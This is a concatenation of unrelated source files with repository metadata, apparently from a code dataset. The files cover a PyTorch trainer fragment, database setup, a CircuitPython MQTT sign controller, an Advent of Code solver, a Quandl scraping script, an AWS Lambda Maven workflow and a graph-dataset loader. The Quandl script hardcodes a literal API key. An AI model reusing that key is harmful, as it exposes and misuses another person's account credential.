torch.set_num_threads(self.train_state.get_kwargs().torch_thread)
logger_print_to_console(sync_out, f"Torch threads set to {torch.get_num_threads()}\n")
use_cuda = args.cuda and torch.cuda.is_available()
model = args.module.get_net_com
if not isinstance(model, GLWPNetInterface):
raise KnownTrainerError(
f"Expected {GLWPNetInterface.__name__} got {type(model).__name__}"
)
if self.__log:
_print_to_logger(sync_out, self.train_state, args, _ExtraData(
use_cuda=use_cuda, model=args.module.get_net_com,
tr_size=sum(len(tr_in) for tr_in in args.input_train)
))
net_stats_creator_dict: Dict[str, TrainReturnFiller] = {}
result_buffer = []
eval_truth_loss = [-1.0, -1.0, -1.0]
for tuple_erg in _train_wrapper(
_TrainWrArgs(
optimizer=args.optimizer, scheduler=args.scheduler,
criterion=args.criterion, device=torch.device("cuda" if use_cuda else "cpu"),
truth_fun_id=args.truth_fun_id, train_ll=self.train_state.get_kwargs().train_ll,
test_ll=self.train_state.get_kwargs().eval_ll,
end_criterion=self.train_state.get_kwargs().end_criterion,
batch_size=self.train_state.get_kwargs().batch_size,
shuffle=self.train_state.get_kwargs().shuffle,
input_train=args.input_train, input_eval=args.input_eval, cuda=use_cuda,
drop_last=self.train_state.get_kwargs().drop_last,
num_workers=self.train_state.get_kwargs().num_workers,
epoch_size=self.train_state.get_kwargs().epoch_size,
report_size=self.train_state.get_kwargs().report_size,
model=model
)
):
for res in tuple_erg:
found_str = _STR_LOSS_NUM.search(res.series)
if self.train_state.get_kwargs().plot_data \
or self.train_state.get_kwargs().write_data:
net_stats_creator = net_stats_creator_dict.setdefault(
res.series, create_train_net_stats_function()
)
id_ne_file = deepcopy(args.id_file)
if found_str is None:
id_ne_file.add_modifier(TrainSubStrSuf.TRUTH.value)
result = net_stats_creator(
TrainNNStatsElemInfo(
id_file=id_ne_file, name_series=res.series,
type_series='Loss Leg' if found_str is not None else 'Truth Leg',
name_sub_series='Loss' if found_str is not None else 'Truth',
type_sub_series='Sub',
x_label="epoch",
y_label='Loss' if found_str is not None else 'Truth',
title="GLW-Pretrainer", subtitle=""
),
[x_elem + res.epoch for x_elem in range(len(res.y_cords))],
res.y_cords,
TrainNNStatsElementFiller(
last=res.last, plot_data=self.train_state.get_kwargs().plot_data,
dump=args.dump, write_data=self.train_state.get_kwargs().write_data,
hyper_param=args.hyper_str if found_str is not None else ""
)
)
if res.last:
result_buffer.append(result)
else:
yield result
if found_str is not None and _EVAL_LOSS_STR == found_str.group(1):
eval_truth_loss[1] = res.y_cords[-1]
if found_str is not None and _TRAIN_LOSS_STR == found_str.group(1):
eval_truth_loss[2] = res.y_cords[-1]
found_str = _STR_TR_V_NUM.search(res.series)
if found_str is not None and _EVAL_TR_V_STR == found_str.group(1):
eval_truth_loss[0] = res.y_cords[-1]
self._set_fitness(eval_truth_loss[1], eval_truth_loss[2], eval_truth_loss[0])
if not isinstance(model, nn.Module):
raise KnownTrainerError(
f"Expected {nn.Module.__name__} got {type(model).__name__}"
)
self.__state_dict = deepcopy(model.state_dict())
yield from result_buffer
| 44.203753 | 100 | 0.643741 |
b2ff5961db747304633158435de402e9a5df46ec
| 638 |
py
|
Python
|
server/src/db/database.py
|
Sheerabth/blob-system
|
808f1591247fecace4cbd121053d79205096ced3
|
[
"MIT"
] | null | null | null |
server/src/db/database.py
|
Sheerabth/blob-system
|
808f1591247fecace4cbd121053d79205096ced3
|
[
"MIT"
] | null | null | null |
server/src/db/database.py
|
Sheerabth/blob-system
|
808f1591247fecace4cbd121053d79205096ced3
|
[
"MIT"
] | null | null | null |
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, Session
from src.config import DATABASE_USER, DATABASE_PASSWORD, DATABASE_HOST, DATABASE_PORT, DATABASE_NAME
SQLALCHEMY_DATABASE_URL = (
f"postgresql://{DATABASE_USER}:{DATABASE_PASSWORD}@{DATABASE_HOST}:{DATABASE_PORT}/{DATABASE_NAME}"
)
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
def get_db() -> Session:
db = SessionLocal()
try:
yield db
finally:
db.close()
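# Illustrative usage (hypothetical caller, not part of this module):
#     db_gen = get_db()
#     db = next(db_gen)   # opens a new session
#     try:
#         ...             # run queries with `db`
#     finally:
#         db_gen.close()  # closing the generator runs the finally block above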
| 30.380952 | 103 | 0.775862 |
9e53f3460dfa9f06fe1c61688c39f68749388d52
| 11,126 |
py
|
Python
|
code_controller.py
|
aerialist/on_air_sign
|
022e351184c86ee24b81105439e6e43025c75f87
|
[
"MIT"
] | null | null | null |
code_controller.py
|
aerialist/on_air_sign
|
022e351184c86ee24b81105439e6e43025c75f87
|
[
"MIT"
] | 2 |
2021-08-10T07:39:00.000Z
|
2021-08-10T13:04:02.000Z
|
code_controller.py
|
aerialist/on_air_sign
|
022e351184c86ee24b81105439e6e43025c75f87
|
[
"MIT"
] | null | null | null |
def reference():
pass
# Raspberry Pi Pico RP2040
#dir(board)
#['__class__', 'A0', 'A1', 'A2', 'A3', 'GP0', 'GP1', 'GP10', 'GP11', 'GP12', 'GP13',
#'GP14', 'GP15', 'GP16', 'GP17', 'GP18', 'GP19', 'GP2', 'GP20', 'GP21', 'GP22', 'GP23',
#'GP24', 'GP25', 'GP26', 'GP26_A0', 'GP27', 'GP27_A1', 'GP28', 'GP28_A2', 'GP3', 'GP4',
#'GP5', 'GP6', 'GP7', 'GP8', 'GP9', 'LED', 'SMPS_MODE', 'VBUS_SENSE', 'VOLTAGE_MONITOR']
# ON_AIR_controller v1.0
# GP12: red button
# GP13: white button
# GP17: Rotary Encoder A
# GP16: Rotary Encoder B
# GP15: Rotary Encoder LED Red
# GP14: Rotary Encoder LED Green
# GP18: Rotary Encoder LED Blue
# GP19: Rotary Encoder Switch
# GP2: AirLift SCK
# GP3: AIrLift MOSI
# GP4: AirLift MISO
# GP5: AirLift CS
# GP6: AirLift BUSY
# GP7: AirLift !RST
# GP8: neopixel
# GP10: SDA
# GP11: SCL
# I2C SSD1306 OLED 128x64 display address 0x3c
#>>> help("modules")
#__main__ board microcontroller storage
#_bleio builtins micropython struct
#_eve busio msgpack supervisor
#_pixelbuf collections neopixel_write sys
#adafruit_bus_device countio os terminalio
#analogio digitalio pulseio time
#array displayio pwmio touchio
#audiobusio errno random ulab
#audiocore fontio re usb_hid
#audiomp3 framebufferio rgbmatrix usb_midi
#audiopwmio gamepad rotaryio vectorio
#binascii gc rp2pio watchdog
#bitbangio io rtc
#bitmaptools json sdcardio
#bitops math sharpdisplay
#Plus any modules on the filesystem
import board
import time
import rtc
import digitalio
from digitalio import DigitalInOut
from adafruit_debouncer import Debouncer
import rotaryio
import busio
from adafruit_datetime import datetime, timedelta
import displayio
import adafruit_displayio_ssd1306
import terminalio
from adafruit_display_text.label import Label
from adafruit_display_shapes.rect import Rect
from adafruit_display_shapes.line import Line
import neopixel
from adafruit_esp32spi import adafruit_esp32spi
from adafruit_esp32spi import adafruit_esp32spi_wifimanager
import adafruit_esp32spi.adafruit_esp32spi_socket as socket
#import adafruit_requests as requests
import adafruit_minimqtt.adafruit_minimqtt as MQTT
from adafruit_io.adafruit_io import IO_MQTT
from secrets import secrets
# OLED Display
WIDTH = 128
HEIGHT = 64
BORDER = 5
BLACK = 0x000000
WHITE = 0xFFFFFF
FEED_ONAIR = "matrix-onair"
FEED_TEXT = "matrix-text"
tz_offset=9 * 60 * 60 # Time zone offset from UTC in seconds
print("ONAIR display controller")
led = digitalio.DigitalInOut(board.LED)
led.direction = digitalio.Direction.OUTPUT
# Rotary Encoder
encoder = rotaryio.IncrementalEncoder(board.GP16, board.GP17)
led_red = digitalio.DigitalInOut(board.GP15)
led_red.direction = digitalio.Direction.OUTPUT
led_red.value = True # OFF
led_green = digitalio.DigitalInOut(board.GP14)
led_green.direction = digitalio.Direction.OUTPUT
led_green.value = True # OFF
led_blue = digitalio.DigitalInOut(board.GP18)
led_blue.direction = digitalio.Direction.OUTPUT
led_blue.value = True # OFF
btnRotaryPin = digitalio.DigitalInOut(board.GP19)
btnRotaryPin.direction = digitalio.Direction.INPUT
btnRotaryPin.pull = digitalio.Pull.UP
#btnRotary = Debouncer(btnRotaryPin, interval=0.1)
btnRotary = Debouncer(btnRotaryPin)
btnRedPin = digitalio.DigitalInOut(board.GP12)
btnRedPin.direction = digitalio.Direction.INPUT
btnRedPin.pull = digitalio.Pull.UP
btnRed = Debouncer(btnRedPin)
btnWhitePin = digitalio.DigitalInOut(board.GP13)
btnWhitePin.direction = digitalio.Direction.INPUT
btnWhitePin.pull = digitalio.Pull.UP
btnWhite = Debouncer(btnWhitePin)
displayio.release_displays()
i2c = busio.I2C(board.GP11, board.GP10)
display_bus = displayio.I2CDisplay(i2c, device_address=0x3c)
display = adafruit_displayio_ssd1306.SSD1306(display_bus, width=WIDTH, height=HEIGHT)
splash = displayio.Group(max_size=10)
group_on = displayio.Group()
splash.append(group_on)
group_on.hidden = True
group_off = displayio.Group()
splash.append(group_off)
group_status = displayio.Group()
group_status.x = WIDTH-6
group_status.y = HEIGHT-2
splash.append(group_status)
rect_on = Rect(0, 0, WIDTH, HEIGHT//2, fill=WHITE)
group_on.append(rect_on)
label_onair = Label(terminalio.FONT, text="ON AIR", color=BLACK)
label_onair.scale=2
label_onair.anchor_point = (0.5, 0.5)
label_onair.anchored_position = (WIDTH//2, HEIGHT//4)
group_on.append(label_onair)
rect_off = Rect(0, 0, WIDTH, HEIGHT//2, fill=BLACK)
group_off.append(rect_off)
label_off = Label(terminalio.FONT, text="GOOD", color=WHITE)
label_off.scale=2
label_off.anchor_point = (0.5, 0.5)
label_off.anchored_position = (WIDTH//2, HEIGHT//4)
group_off.append(label_off)
label_time = Label(terminalio.FONT, text="13:30", color=WHITE)
label_time.scale=2
label_time.anchor_point = (0.5, 0.5)
label_time.anchored_position = (WIDTH//4, 3*(HEIGHT//4))
splash.append(label_time)
label_time.text = ""
line_time = Line(2,HEIGHT-2, WIDTH//2-2, HEIGHT-2, color=WHITE)
splash.append(line_time)
label_time_feed = Label(terminalio.FONT, text="13:30", color=WHITE)
label_time_feed.scale=2
label_time_feed.anchor_point = (0.5, 0.5)
label_time_feed.anchored_position = (3*WIDTH//4, 3*(HEIGHT//4))
splash.append(label_time_feed)
label_time_feed.text = ""
rect_status = Rect(0,0,5,5,fill=WHITE)
group_status.append(rect_status)
def turn_on():
group_on.hidden = False
group_off.hidden = True
label_time.text = "13:30"
def turn_off():
group_on.hidden = True
group_off.hidden = False
label_time.text = ""
display.show(splash)
esp32_cs = DigitalInOut(board.GP5)
esp32_ready = DigitalInOut(board.GP6)
esp32_reset = DigitalInOut(board.GP7)
spi = busio.SPI(board.GP2, board.GP3, board.GP4)
esp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)
# esp._debug = True
status_light = neopixel.NeoPixel(board.GP8, 1, brightness=0.2)
wifi = adafruit_esp32spi_wifimanager.ESPSPI_WiFiManager(esp, secrets, status_light)
#requests.set_socket(socket, esp)
def connected(client):
# Connected function will be called when the client is connected to Adafruit IO.
print("Connected to Adafruit IO! ")
group_status.y -= 1
def subscribe(client, userdata, topic, granted_qos):
# This method is called when the client subscribes to a new feed.
print("Subscribed to {0} with QOS level {1}".format(topic, granted_qos))
def disconnected(client):
# Disconnected function will be called when the client disconnects.
print("Disconnected from Adafruit IO!")
def on_matrix_onair(client, topic, message):
# Method called whenever user/feeds/led has a new value
print("New message on topic {0}: {1} ".format(topic, message))
if message == "ON":
led.value = True
group_on.hidden = False
group_off.hidden = True
elif message == "OFF":
led.value = False
group_on.hidden = True
group_off.hidden = False
else:
print("Unexpected message on LED feed.")
def on_matrix_text(client, topic, message):
print("New message on topic {0}: {1} ".format(topic, message))
if message == ".":
label_time_feed.text = ""
else:
label_time_feed.text = message
def update_time_area_text(position):
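    # Display the current time plus one hour, shifted by 10 minutes per encoder
    # detent and rounded down to the nearest 10 minutes (see the math below).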
dt = datetime.now() + timedelta(minutes=10*position) + timedelta(hours=1)
pp = "{:02d}:{:02d}".format(dt.hour, dt.minute//10*10)
#print(pp)
label_time.text = pp
# Connect to WiFi
print("Connecting to WiFi...")
wifi.connect()
print("Connected!")
group_status.y -= 1
# Get time from NTP server and set system time
while True:
    # esp get_time fails in the first few attempts
try:
now = esp.get_time()
except ValueError as e:
print(e)
time.sleep(1)
else:
break
print(now)
now = time.localtime(now[0] + tz_offset)
print(now)
rtc.RTC().datetime = now
group_status.y -= 1
# Initialize MQTT interface with the esp interface
MQTT.set_socket(socket, esp)
mqtt_client = MQTT.MQTT(
broker="io.adafruit.com",
username=secrets["aio_username"],
password=secrets["aio_password"],
)
io = IO_MQTT(mqtt_client)
io.on_connect = connected
io.on_disconnect = disconnected
io.on_subscribe = subscribe
io.add_feed_callback(FEED_ONAIR, on_matrix_onair)
io.add_feed_callback(FEED_TEXT, on_matrix_text)
print("Connecting to Adafruit IO...")
io.connect()
# Subscribe to all messages on the led feed
io.subscribe(FEED_ONAIR)
io.subscribe(FEED_TEXT)
def loop():
last_position = None
while True:
#print(time.monotonic())
btnRotary.update()
btnRed.update()
btnWhite.update()
position = encoder.position
if last_position is None or position != last_position:
update_time_area_text(position)
last_position = position
if btnRed.rose == True:
print("btnRed is pressed")
led_blue.value = False
led_green.value = True
encoder.position = 0
position = 0
last_position = 0
update_time_area_text(position)
io.publish(FEED_ONAIR, "ON")
print("Published!")
io.publish(FEED_TEXT, ".")
print("Published!")
if btnWhite.rose == True:
print("btnWhite is pressed")
led_blue.value = True
led_green.value = True
io.publish(FEED_ONAIR, "OFF")
print("Published!")
io.publish(FEED_TEXT, ".")
print("Published!")
if btnRotary.rose == True:
print("btnRotary is pressed")
#if group_on.hidden == False:
led_green.value = False
io.publish(FEED_TEXT, "~"+label_time.text)
print("Published!")
# Poll for incoming messages
try:
io.loop(0.1)
except (ValueError, RuntimeError, MQTT.MMQTTException) as e:
print("Failed to get data, retrying\n", e)
try:
wifi.reset()
wifi.connect()
io.reconnect()
#Failed to get data, retrying
# ESP32 timed out on SPI select
#Traceback (most recent call last):
# File "code.py", line 190, in <module>
# File "code.py", line 189, in <module>
# File "adafruit_io/adafruit_io.py", line 101, in reconnect
# File "adafruit_io/adafruit_io.py", line 101, in reconnect
#AdafruitIO_MQTTError: MQTT Error: Unable to reconnect to Adafruit IO.
except Exception as e:
print("Still network error... keep trying.")
print(e)
continue
loop()
| 33.014837 | 92 | 0.665558 |
741f53c230fa684a07e78aee1d3515b89005d4e8
| 254 |
py
|
Python
|
project/WeiboTest/Logger.py
|
zhengbomo/python_practice
|
1bc5c4ff426f806639bbc01249e66747271ec398
|
[
"MIT"
] | 2 |
2016-10-03T10:20:02.000Z
|
2018-03-20T00:38:53.000Z
|
project/WeiboTest/Logger.py
|
zhengbomo/python_practice
|
1bc5c4ff426f806639bbc01249e66747271ec398
|
[
"MIT"
] | 2 |
2019-10-08T07:13:44.000Z
|
2019-10-08T07:13:46.000Z
|
project/WeiboTest/Logger.py
|
zhengbomo/python_practice
|
1bc5c4ff426f806639bbc01249e66747271ec398
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding:utf-8 -*-
class Logger(object):
@staticmethod
def info(type_, message):
pass
@staticmethod
def warning(type_, message):
pass
@staticmethod
def error(type_, message):
pass
| 14.941176 | 32 | 0.582677 |
a27c28a351371ddf09faf846671de43198a11bc5
| 4,428 |
py
|
Python
|
2016/11/11-python.py
|
allengarvin/adventofcode
|
004719c1721e514e3e8de8e94c25e0f858e96838
|
[
"BSD-3-Clause"
] | null | null | null |
2016/11/11-python.py
|
allengarvin/adventofcode
|
004719c1721e514e3e8de8e94c25e0f858e96838
|
[
"BSD-3-Clause"
] | null | null | null |
2016/11/11-python.py
|
allengarvin/adventofcode
|
004719c1721e514e3e8de8e94c25e0f858e96838
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
import sys, re, itertools
from operator import and_, or_, xor
def mysplit(s):
return re.split(", and | and |, ", s)
def main():
floors = [0,0,0,0]
things = []
for l in map(lambda x: x.strip(), open("../advent-2016/11-input.txt").readlines()):
fl, stuff = l.split(" contains ")
stuff = stuff.rstrip(".")
#print stuff
fl_num = { "The first floor" : 0, "The second floor" : 1, "The third floor" : 2, "The fourth floor": 3 }[fl]
floors[fl_num] = []
if stuff == "nothing relevant":
continue
for t in mysplit(stuff):
things.append(t)
floors[fl_num].append(t)
things = sorted(things)
def convert_to_binary(contents):
n = 0
for i, what in enumerate(things):
if what in contents:
n |= 1 << i
return n << 1
floors = map(convert_to_binary, floors)
floors[0] |= 1
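    # Each floor is a bitmask: bit 0 marks the elevator's position, and every
    # item occupies one bit starting at bit 1 (convert_to_binary shifts by one).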
def shorten(thing):
return "".join(map(lambda x: x[0].upper(), thing.split(" ")[1:]))
def display_floor(n):
s = "E " if n & 1 else ". "
for i, what in enumerate(things):
s += shorten(what) if ((2**i)<<1) & n else ". "
s += " "
return s
def display(fl):
s = ""
print fl
for fn in range(4, 0, -1):
s += "F" + str(fn) + " "
f = fl[fn-1]
s += "E " if f & 1 else ". "
for i, what in enumerate(things):
s += shorten(what) if ((2 ** i)<<1) & f else ". "
s += " "
s += "\n"
print s
def current_floor(floors_tmp):
for i, w in enumerate(floors_tmp):
if w & 1:
return i
print "NO ELEVATOR EXISTS. BUG. current_floor() call"
sys.exit(1)
def avail_to_move(floors_tmp):
fl = current_floor(floors_tmp)
items = []
for i, what in enumerate(things):
if floors_tmp[fl] & (1 << (i+1)):
items.append(1 << (i+1))
return map(lambda x: x[0] | x[1], itertools.combinations(items, 2)) + items
def adjacent_floors(floors_tmp):
fl = current_floor(floors_tmp)
if fl == 0:
return [1]
elif fl == 3:
return [2]
else:
return [fl-1, fl+1]
def test_valid(fl, new):
proposed_floor = fl | new
generators = set([])
chips = set([])
for i, x in enumerate(things):
if proposed_floor & (1 << (i+1)):
if "generator" in x:
generators.add(x.split()[1])
else:
chips.add(x.split()[1].split("-")[0])
if len(generators - chips) and len(chips - generators):
#print "Inval: ", display_floor(proposed_floor)
return False
else:
#print "Valid: ", display_floor(proposed_floor)
return True
steps = { 0 : set( [tuple(floors) ] ) }
#steps = { 0 : set( [(16, 7, 8, 0) ] ) }
#steps = { 0 : set( [(21, 0, 10, 0)] ) }
step = 1
while True:
steps[step] = set()
print "====================", step, "=================="
for i in steps[step-1]:
fl = list(i)
for f in adjacent_floors(fl):
for m in avail_to_move(fl):
if test_valid(fl[f], m) and test_valid(fl[current_floor(fl)] ^ (m), 0):
new_fl = fl[:]
new_fl[current_floor(fl)] ^= (1 | m)
new_fl[f] |= (1 | m)
new_fl = tuple(new_fl)
                        if any(new_fl in steps[st] for st in range(step)):
                            continue
if new_fl[3] == 2 ** (len(things) + 1) - 1:
display(new_fl)
print "WE WON", step
sys.exit(1)
steps[step].add(new_fl)
#display(new_fl)
#print steps
step += 1
#print step
# Answer 2 is easy. Some experimentation found that every extra two items on the first floor add 12 steps. I could optimize this
# but this problem has annoyed me long enough.
if __name__ == "__main__":
main()
| 29.52 | 116 | 0.448961 |
7454d59253416b1e4146fc587311759e15eaaec6
| 281 |
py
|
Python
|
sentdex_data_analysis/pandas_building_dataset.py
|
yull1860outlook/Data-Analysis
|
b777d9a75eb1acc4c899946d547e5585469a83ae
|
[
"MIT"
] | 4,358 |
2017-12-29T17:56:07.000Z
|
2022-03-30T15:14:57.000Z
|
sentdex_data_analysis/pandas_building_dataset.py
|
MarwanAmr509/Data-Analysis
|
34a48f16f6be757ed3f35cb3fc458569023c9bd8
|
[
"MIT"
] | 61 |
2018-01-18T17:50:46.000Z
|
2022-03-09T20:16:01.000Z
|
sentdex_data_analysis/pandas_building_dataset.py
|
MarwanAmr509/Data-Analysis
|
34a48f16f6be757ed3f35cb3fc458569023c9bd8
|
[
"MIT"
] | 3,689 |
2017-12-29T17:57:36.000Z
|
2022-03-29T12:26:03.000Z
|
import quandl
import pandas as pd
api_key = "rFsSehe51RLzREtYhLfo"
# df = quandl.get('FMAC/HPI_AK', authtoken = api_key)
fifty_states = pd.read_html("https://simple.wikipedia.org/wiki/List_of_U.S._states")
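# read_html returns a list of DataFrames; table 0, column 0 holds the state
# abbreviations (the [1:] below skips the header row), which are used to build
# the Quandl FMAC/HPI_<abbreviation> codes.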
for abbv in fifty_states[0][0][1:]:
print("FMAC/HPI_" + str(abbv))
| 23.416667 | 84 | 0.72242 |
36d6dbb1cf9fa3df911ae1417ed5774b8b6b8c6b
| 2,324 |
py
|
Python
|
aws_lambda_builders/workflows/java_maven/workflow.py
|
eldritchideen/aws-lambda-builders
|
8bd869d9c2b83f67b4f37d45883f9436e1cb1179
|
[
"Apache-2.0"
] | 88 |
2020-09-03T18:51:44.000Z
|
2022-03-22T23:46:14.000Z
|
aws_lambda_builders/workflows/java_maven/workflow.py
|
eldritchideen/aws-lambda-builders
|
8bd869d9c2b83f67b4f37d45883f9436e1cb1179
|
[
"Apache-2.0"
] | 88 |
2020-09-01T19:22:28.000Z
|
2022-03-30T01:55:36.000Z
|
aws_lambda_builders/workflows/java_maven/workflow.py
|
eldritchideen/aws-lambda-builders
|
8bd869d9c2b83f67b4f37d45883f9436e1cb1179
|
[
"Apache-2.0"
] | 40 |
2020-09-02T17:29:39.000Z
|
2022-03-31T02:36:17.000Z
|
"""
Java Maven Workflow
"""
from aws_lambda_builders.workflow import BaseWorkflow, Capability
from aws_lambda_builders.actions import CopySourceAction, CleanUpAction
from aws_lambda_builders.workflows.java.actions import JavaCopyDependenciesAction, JavaMoveDependenciesAction
from aws_lambda_builders.workflows.java.utils import OSUtils
from .actions import JavaMavenBuildAction, JavaMavenCopyDependencyAction, JavaMavenCopyArtifactsAction
from .maven import SubprocessMaven
from .maven_resolver import MavenResolver
from .maven_validator import MavenValidator
class JavaMavenWorkflow(BaseWorkflow):
"""
A Lambda builder workflow that knows how to build Java projects using Maven.
"""
NAME = "JavaMavenWorkflow"
CAPABILITY = Capability(language="java", dependency_manager="maven", application_framework=None)
EXCLUDED_FILES = (".aws-sam", ".git")
def __init__(self, source_dir, artifacts_dir, scratch_dir, manifest_path, **kwargs):
super(JavaMavenWorkflow, self).__init__(source_dir, artifacts_dir, scratch_dir, manifest_path, **kwargs)
self.os_utils = OSUtils()
# Assuming root_dir is the same as source_dir for now
root_dir = source_dir
subprocess_maven = SubprocessMaven(maven_binary=self.binaries["mvn"], os_utils=self.os_utils)
self.actions = [
CopySourceAction(root_dir, scratch_dir, excludes=self.EXCLUDED_FILES),
JavaMavenBuildAction(scratch_dir, subprocess_maven),
JavaMavenCopyDependencyAction(scratch_dir, subprocess_maven),
JavaMavenCopyArtifactsAction(scratch_dir, artifacts_dir, self.os_utils),
]
if self.dependencies_dir:
# clean up the dependencies first
self.actions.append(CleanUpAction(self.dependencies_dir))
if self.combine_dependencies:
self.actions.append(JavaCopyDependenciesAction(artifacts_dir, self.dependencies_dir, self.os_utils))
else:
self.actions.append(JavaMoveDependenciesAction(artifacts_dir, self.dependencies_dir, self.os_utils))
def get_resolvers(self):
return [MavenResolver(executable_search_paths=self.executable_search_paths)]
def get_validators(self):
return [MavenValidator(self.runtime, self.architecture, self.os_utils)]
| 42.254545 | 116 | 0.75 |
6bd99c6eba0ca874b896c3c335b28ec78111e901
| 172 |
py
|
Python
|
v1/items/urls.py
|
DucPhamTV/MaiTet
|
44a1465a3239808f6640592ba666d9c5449c0ef4
|
[
"MIT"
] | null | null | null |
v1/items/urls.py
|
DucPhamTV/MaiTet
|
44a1465a3239808f6640592ba666d9c5449c0ef4
|
[
"MIT"
] | 15 |
2021-02-20T12:03:33.000Z
|
2021-07-26T10:15:03.000Z
|
v1/items/urls.py
|
DucPhamTV/MaiTet
|
44a1465a3239808f6640592ba666d9c5449c0ef4
|
[
"MIT"
] | null | null | null |
from rest_framework.routers import SimpleRouter
from v1.items.views import ItemViewSet
router = SimpleRouter(trailing_slash=False)
router.register('items', ItemViewSet)
| 21.5 | 47 | 0.831395 |
440b188398b16e3b21a45a5676f2f967ada33693
| 6,778 |
py
|
Python
|
bindings/python/ensmallen_graph/datasets/string/comamonasaquatica.py
|
caufieldjh/ensmallen_graph
|
14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a
|
[
"MIT"
] | null | null | null |
bindings/python/ensmallen_graph/datasets/string/comamonasaquatica.py
|
caufieldjh/ensmallen_graph
|
14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a
|
[
"MIT"
] | null | null | null |
bindings/python/ensmallen_graph/datasets/string/comamonasaquatica.py
|
caufieldjh/ensmallen_graph
|
14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a
|
[
"MIT"
] | null | null | null |
"""
This file offers the methods to automatically retrieve the graph Comamonas aquatica.
The graph is automatically retrieved from the STRING repository.
Report
---------------------
At the time of rendering these methods (please see datetime below), the graph
had the following characteristics:
Datetime: 2021-02-02 23:22:47.704643
The undirected graph Comamonas aquatica has 3197 nodes and 364326 weighted
edges, of which none are self-loops. The graph is dense as it has a density
of 0.07131 and has 5 connected components, where the component with most
nodes has 3181 nodes and the component with the least nodes has 2 nodes.
The graph median node degree is 193, the mean node degree is 227.92, and
the node degree mode is 5. The top 5 most central nodes are 1219031.BBJR01000069_gene1085
(degree 1347), 1219031.BBJR01000052_gene1535 (degree 1147), 1219031.BBJR01000036_gene3013
(degree 1129), 1219031.BBJR01000058_gene1943 (degree 1090) and 1219031.BBJR01000031_gene298
(degree 1067).
References
---------------------
Please cite the following if you use the data:
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
Usage example
----------------------
The usage of this graph is relatively straightforward:
.. code:: python
# First import the function to retrieve the graph from the datasets
from ensmallen_graph.datasets.string import ComamonasAquatica
# Then load the graph
graph = ComamonasAquatica()
# Finally, you can do anything with it, for instance, compute its report:
print(graph)
# If you need to run a link prediction task with validation,
# you can split the graph using a connected holdout as follows:
train_graph, validation_graph = graph.connected_holdout(
# You can use an 80/20 split the holdout, for example.
train_size=0.8,
# The random state is used to reproduce the holdout.
random_state=42,
        # Whether to show a loading bar.
verbose=True
)
# Remember that, if you need, you can enable the memory-time trade-offs:
train_graph.enable(
vector_sources=True,
vector_destinations=True,
vector_outbounds=True
)
# Consider using the methods made available in the Embiggen package
# to run graph embedding or link prediction tasks.
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen_graph import EnsmallenGraph # pylint: disable=import-error
def ComamonasAquatica(
directed: bool = False,
verbose: int = 2,
cache_path: str = "graphs/string",
**additional_graph_kwargs: Dict
) -> EnsmallenGraph:
"""Return new instance of the Comamonas aquatica graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False,
        Whether to load the graph as directed or undirected.
By default false.
verbose: int = 2,
        Whether to show loading bars during the retrieval and building
of the graph.
cache_path: str = "graphs",
Where to store the downloaded graphs.
additional_graph_kwargs: Dict,
Additional graph kwargs.
Returns
-----------------------
    Instance of Comamonas aquatica graph.
Report
---------------------
At the time of rendering these methods (please see datetime below), the graph
had the following characteristics:
Datetime: 2021-02-02 23:22:47.704643
The undirected graph Comamonas aquatica has 3197 nodes and 364326 weighted
edges, of which none are self-loops. The graph is dense as it has a density
of 0.07131 and has 5 connected components, where the component with most
nodes has 3181 nodes and the component with the least nodes has 2 nodes.
The graph median node degree is 193, the mean node degree is 227.92, and
the node degree mode is 5. The top 5 most central nodes are 1219031.BBJR01000069_gene1085
(degree 1347), 1219031.BBJR01000052_gene1535 (degree 1147), 1219031.BBJR01000036_gene3013
(degree 1129), 1219031.BBJR01000058_gene1943 (degree 1090) and 1219031.BBJR01000031_gene298
(degree 1067).
References
---------------------
Please cite the following if you use the data:
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
Usage example
----------------------
The usage of this graph is relatively straightforward:
.. code:: python
# First import the function to retrieve the graph from the datasets
from ensmallen_graph.datasets.string import ComamonasAquatica
# Then load the graph
graph = ComamonasAquatica()
# Finally, you can do anything with it, for instance, compute its report:
print(graph)
# If you need to run a link prediction task with validation,
# you can split the graph using a connected holdout as follows:
train_graph, validation_graph = graph.connected_holdout(
# You can use an 80/20 split the holdout, for example.
train_size=0.8,
# The random state is used to reproduce the holdout.
random_state=42,
            # Whether to show a loading bar.
verbose=True
)
# Remember that, if you need, you can enable the memory-time trade-offs:
train_graph.enable(
vector_sources=True,
vector_destinations=True,
vector_outbounds=True
)
# Consider using the methods made available in the Embiggen package
# to run graph embedding or link prediction tasks.
"""
return AutomaticallyRetrievedGraph(
graph_name="ComamonasAquatica",
dataset="string",
directed=directed,
verbose=verbose,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| 35.486911 | 223 | 0.707583 |
7656bd9c717655f42843f8e616fc8b4ef4f25325
| 8,781 |
py
|
Python
|
framework/TSA/RWD.py
|
yenili/raven
|
cc5f10e387d40219213beff05a3f72e9386034d5
|
[
"Apache-2.0"
] | 1 |
